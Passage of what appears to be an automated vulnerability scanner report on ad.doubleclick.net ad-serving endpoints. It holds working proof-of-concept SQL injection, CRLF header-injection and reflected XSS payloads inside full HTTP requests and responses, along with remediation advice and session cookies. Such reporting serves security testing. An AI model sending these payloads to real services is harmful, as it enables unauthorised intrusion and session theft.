var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array(); sm[1] = ""; sm[2] = ""; sm[3] = ""; sm[4] = ""; sm[5] = "";
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D% ...[SNIP]...
Request 2
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d2--%20&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d2--%20&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>
The pt parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the pt parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d1--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d1--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>
Request 2
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d2--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf"; var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg"; var minV = 6; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d2--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array(); sm[1] = ""; sm[2] = ""; sm[3] = ""; sm[4] = ""; sm[5] = "";
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D% ...[SNIP]...
The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185'%20and%201%3d1--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf"; var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg"; var minV = 6; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185'%20and%201%3d1--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array(); sm[1] = ""; sm[2] = ""; sm[3] = ""; sm[4] = ""; sm[5] = "";
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D ...[SNIP]...
Request 2
GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185'%20and%201%3d2--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.metacritic.com/games/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185'%20and%201%3d2--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>
The value of REST URL parameter 1 is copied into the Location response header. The payload cb557%0d%0a32406b19dfe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
Request
GET /dot.gifcb557%0d%0a32406b19dfe?2011.04.27.23.14.45 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6c9c"-alert(1)-"edfe4a4f26d was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59c6c9c"-alert(1)-"edfe4a4f26d&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4c6f"-alert(1)-"ed7ce2bf638 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=f4c6f"-alert(1)-"ed7ce2bf638&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce68e"-alert(1)-"d288f6ef5a2 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=ce68e"-alert(1)-"d288f6ef5a2&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80897"-alert(1)-"d0bb0cf4d58 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=80897"-alert(1)-"d0bb0cf4d58&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa51d"-alert(1)-"1d6c11e2fec was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=aa51d"-alert(1)-"1d6c11e2fec&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9c36"-alert(1)-"b25cda93eb9 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=b9c36"-alert(1)-"b25cda93eb9&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 